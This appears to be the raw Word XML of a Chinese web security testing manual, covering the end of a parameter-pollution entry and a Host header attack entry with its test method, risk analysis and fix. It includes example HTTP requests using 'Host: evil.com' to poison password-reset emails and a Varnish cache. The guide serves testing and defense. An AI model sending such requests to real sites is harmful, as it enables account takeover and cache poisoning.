      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：同名参数绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter </w:t>
      </w:r>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或其他规则</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BE33FB" w14:textId="163F2538" w:rsidR="00A944EF" w:rsidRDefault="00A944EF" w:rsidP="00F24A91">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
      <w:r w:rsidR="00B15369" w:rsidRPr="00F24A91">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序应正确过滤用户输入（过滤所有参数），以防止此漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0E5C91" w14:textId="3E01ECBC" w:rsidR="00EF7E10" w:rsidRPr="00B15369" w:rsidRDefault="00EF7E10" w:rsidP="00F24A91">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FDCE2C1" w14:textId="13EE857C" w:rsidR="00A944EF" w:rsidRPr="00F757E4" w:rsidRDefault="00CA6BAF" w:rsidP="00A82BA3">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="94" w:name="_Toc498434556"/>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host</w:t>
      </w:r>
      <w:r w:rsidRPr="00F757E4">
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>头攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="94"/>
    </w:p>
    <w:p w14:paraId="4A3DDD62" w14:textId="31DCD8A1"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漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序获取网站域名一般是依赖</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Host header</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（比如在</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JSP</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里通过</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>request.getHeader()</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取），这里的</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>很多情况下是不可靠的。攻击者恶意利用</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP Host header</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会导致</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Host</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>头攻击发生</w:t>
      </w:r>
      <w:r w:rsidR="005B7216" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4262D7E9" w14:textId="77777777"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测试方法：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A1E3F" w14:textId="77777777" w:rsidR="005B7216" w:rsidRPr="005E6EBE" w:rsidRDefault="005B7216" w:rsidP="005E6EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密码重置污染攻击，点击重置密码的链接时，</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">url::abs_site </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这一部分使用的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host header</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是来自用户重置密码的请求，那么可以通过一个受他控制的链接来污染密码重置的邮件，例如替换</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：当然这种攻击方式一定要能骗取用户点击访问这个受污染的链接，如果用户警觉了没有点击，那么攻击就会失败</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5B7216" w:rsidRPr="005E6EBE" w14:paraId="5AB5E2BF" w14:textId="77777777" w:rsidTr="001A6FF2">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770DCF"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POST /password/reset HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F599D83"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Host: evil.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BFC5FDC"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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1BF680BF"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lastRenderedPageBreak/>
              <w:t>&gt; csrf=1e8d5c9bceb16667b1b330cc5fd48663&amp;name=admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0EC89E8B" w14:textId="77777777" w:rsidR="005B7216" w:rsidRPr="005E6EBE" w:rsidRDefault="005B7216" w:rsidP="005E6EBE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4176F637" w14:textId="77777777" w:rsidR="005B7216" w:rsidRPr="005E6EBE" w:rsidRDefault="005B7216" w:rsidP="005E6EBE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="80"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host header</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来污染缓存的攻击方法</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD06CE8"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hint="eastAsia"/>
        </w:rPr>
        <w:t>因此为了能使缓存能将污染后的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>response</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回给用户，我们还必须让缓存服务器看到的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">host header </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和应用看到的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">host header </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不一样</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>比如说对于</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Varnish</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（一个很有名的缓存服务软件），可以使用一个复制的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Host header</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Varnish</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是通过最先到达的请求的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host header</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来辨别</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的，而</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Apache</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则是看所有请求的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Nginx</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>则只是看最后一个请求的</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这就意味着你可以通过下面这个请求来欺骗</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Varnish</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>达到污染的目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5B7216" w:rsidRPr="005E6EBE" w14:paraId="6367E03B" w14:textId="77777777" w:rsidTr="001A6FF2">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EEBA5A"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GET / HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="426FDFC5"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Host: example.com</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E85092"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Host: evil.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6501E148" w14:textId="2312268E" w:rsidR="00A944EF" w:rsidRPr="005E6EBE" w:rsidRDefault="005B7216" w:rsidP="005E6EBE">
      <w:pPr>
        <w:pStyle w:val="af1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描工具进行检测。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06697E9D" w14:textId="3CD583ED" w:rsidR="00A944EF" w:rsidRPr="005E6EBE" w:rsidRDefault="00C24790" w:rsidP="005E6EBE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="00A944EF" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>大部分的</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用程序未经</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编码直接把</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出到了页面中。比如：</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>&lt;link href=http://request.getHeader(“Host”) &gt;</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。有些</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中还包含有</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>secret key</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>token</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如：</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>&lt;a href="http://request.getHeader(“Host”)?token=topsecret"&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这样处理</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>header</w:t>
      </w:r>
      <w:r w:rsidR="00821E2A" w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一般会产生两种常见的攻击：缓存污染和密码重置。缓存污染是指攻击者通过控制一个缓存系统来将一个恶意站点的页面返回给用户。密码重置这种攻击主要是因为发送给用户的内容是被污染的，即间接的劫持邮件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182AFDE4" w14:textId="77777777"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风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445AD7CA" w14:textId="270A2A5B" w:rsidR="00A944EF" w:rsidRPr="005E6EBE" w:rsidRDefault="00ED2D8C" w:rsidP="005E6EBE">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：请求数据包包中</w:t>
      </w:r>
      <w:r w:rsidRPr="005E6EBE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
